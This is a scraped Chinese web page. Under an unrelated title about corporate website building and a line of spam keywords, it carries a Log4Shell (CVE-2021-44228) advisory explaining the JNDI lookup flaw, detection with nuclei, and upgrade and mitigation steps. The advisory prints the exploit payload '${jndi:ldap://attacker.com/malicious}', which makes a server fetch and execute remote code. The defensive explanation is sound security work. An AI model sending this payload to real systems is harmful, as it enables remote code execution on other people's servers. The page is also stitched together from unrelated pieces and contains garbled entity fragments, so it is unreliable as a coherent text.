企业官网建设流程全解析

找人做ps的网站,软文经典案例,成品短视频app有哪些,青白江区网站开发招聘CVSS评分#xff1a;10.0#xff08;满分#xff09; CVE-2021-44228_ ApacheLog4j2远程代码执行漏洞 1. 漏洞原理2. 漏洞危害3. 漏洞修复升级版本修复缓释方案 1. 漏洞原理 Apache Log4j2 作为广泛使用的 Java 日志库#xff0c;支持一种叫做 Lookup#xff08;查找替换…CVSS评分10.0满分CVE-2021-44228_ ApacheLog4j2远程代码执行漏洞1. 漏洞原理2. 漏洞危害3. 漏洞修复升级版本修复缓释方案1. 漏洞原理Apache Log4j2 作为广泛使用的 Java 日志库支持一种叫做Lookup查找替换的机制用于在日志消息中动态注入变量或外部内容。例如${jndi:ldap://malicious-server/exploit}这是一个 JNDI Lookup 表达式它让 Log4j 去调用 Java Naming and Directory InterfaceJNDI 去解析某个 URL。然而在受到漏洞影响的 Log4j 版本中JNDI 查找可以从 LDAP、RMI、DNS 等远程服务器获取并执行代码。攻击 step攻击者构造 payload例如 HTTP User‑Agent 或其他可被日志记录的字段包含${jndi:ldap://attacker.com/malicious}。目标应用接收请求Log4j 记录日志消息发现字符串中的 JNDI LookupJNDI 启动并向攻击者控制的服务器发起 LDAP其他协议也可以请求攻击者服务器返回一个恶意 Java 类恶意类被执行导致任意代码执行RCE检测方法需要机器有出网的权限nuclei -u http://xxx.xxx.xxx/ -t nuclei-templates/http/cves/2021/CVE-2021-44228.yaml2. 漏洞危害微步标记极度高危应立刻修复3. 漏洞修复升级版本修复官方已发布修复版本https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2升级 Log4j 到修补版本升级到 Log4j 2.16.0 或更高2.15.0可能不稳定更高版本如 2.17.x已彻底禁用了可能的远程 JNDI Lookup。缓释方案1、设置 JVM 系统变量或环境变量-Dlog4j2.formatMsgNoLookupstrue或者exportLOG4J_FORMAT_MSG_NO_LOOKUPStrue这将阻止 Log4j 解析 Lookup 表达式从而降低攻击面。2、移除 JndiLookup 类在无法升级时可以手动从 JAR 包中移除 JNDI 代码zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class这能阻止 JNDI Lookup 类被加载。